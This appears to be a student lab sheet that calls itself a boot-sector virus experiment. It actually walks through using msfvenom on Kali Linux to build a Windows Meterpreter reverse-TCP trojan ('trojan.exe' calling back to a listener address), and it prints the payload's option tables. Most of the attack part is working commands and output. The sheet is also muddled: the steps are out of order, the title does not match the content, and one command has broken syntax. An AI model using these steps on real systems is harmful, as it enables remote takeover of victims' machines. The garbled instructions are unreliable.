

EXPERIMENT NO:9

EXPERIMENT NAME:IMPLEMENT THE BOOT SECTOR

VIRUS PROCEDURE:

Step 1: Update and Upgrade Kali Linux

Open the terminal and type in: `sudo apt-get update`

Next, type in: `sudo apt-get upgrade`

Step 3: Fix any errors

If you see this, it means that bundler is either set up incorrectly or hasn't been updated.

To fix this, change the current directory (file) to `usr/share/metasploit-framework` by typing in:

`>> cd /usr/share/metasploit-framework/`

from the root directory. If you make a mistake, you can type in

`>> cd ..`

to go back to the previous directory or type in any directory after `cd` to go there.

3.Now that we are in the `metasploit-framework` directory, type in

`>> gem install bundler`

to install bundler, then type in

`>> bundle install`

4.If bundler is not the correct version, you should get a message telling you which version to install (in this case it was 1.17.3). Type in

`>> gem install bundler: [version number]`

and then type in: `gem update --system`

After all of that, everything should work perfectly.

`>> cd /root`

to go back to the root directory.

Step 2: Open exploit software

Open up the terminal and type in : `msfvenom`

Step 4: Choose our payload

To see a list of payloads: `msfvenom -l payloads`

Step 5: Customize our payload

`msfvenom --list-options -p windows/meterpreter/reverse_tcp`

Step 6: Generate the virus

Now that we have our payload, ip address, and port number, we have all the information that we need.

Type in:

Syntax:

`msfvenom -p [payload] LHOST=[your ip address] LPORT=[the port number] -f [file type] > [path]`

Example

`msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.253 LPORT=4444 -f exe > trojan.exe`

OUTPUT:

```
[root@kali:~]# msfvenom --list-options -p windows/meterpreter/reverse_tcp
Options for payload/windows/meterpreter/reverse_tcp:

Name: Windows Meterpreter (Reflective Injection), Reverse TCP Stager
Module: payload/windows/meterpreter/reverse_tcp
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 296
Rank: Normal

Provided by:
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sf <stephen_fewer@harmonysecurity.com>
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Basic options:


| Name     | Current Setting | Required | Description                                               |
|----------|-----------------|----------|-----------------------------------------------------------|
| EXITFUNC | process         | yes      | Exit technique (Accepted: '', seh, thread, process, none) |
| LHOST    |                 | yes      | The listen address (an interface may be specified)        |
| LPORT    | 4444            | yes      | The listen port                                           |



Description:
Inject the Meterpreter server DLL via the Reflective DLL Injection
payload (staged). Requires Windows XP SP2 or newer. Connect back to
the attacker

Advanced options for payload/windows/meterpreter/reverse_tcp:



| Name                     | Current Setting | Required | Description                                                                  |
|--------------------------|-----------------|----------|------------------------------------------------------------------------------|
| AutoloadStdapi           | true            | yes      | Automatically load the Stdapi extension                                      |
| AutoRunScript            | false           | no       | A script to run automatically on session creation.                           |
| AutoSystemInfo           | true            | yes      | Automatically capture system information on initialization.                  |
| AutoUnhookProcess        | false           | yes      | Automatically load the unhook extension and unhook the process.              |
| AutoVerifySessionTimeout | 30              | no       | Timeout period to wait for session validation to occur, in seconds           |
| EnableStageEncoding      | false           | no       | Encode the second stage payload                                              |
| EnableUnicodeEncoding    | false           | yes      | Automatically encode UTF-8 strings as hexadecimal                            |
| HandlerSSLCert           |                 | no       | Path to a SSL certificate in unified PEM format. ignored for HTTP transports |


```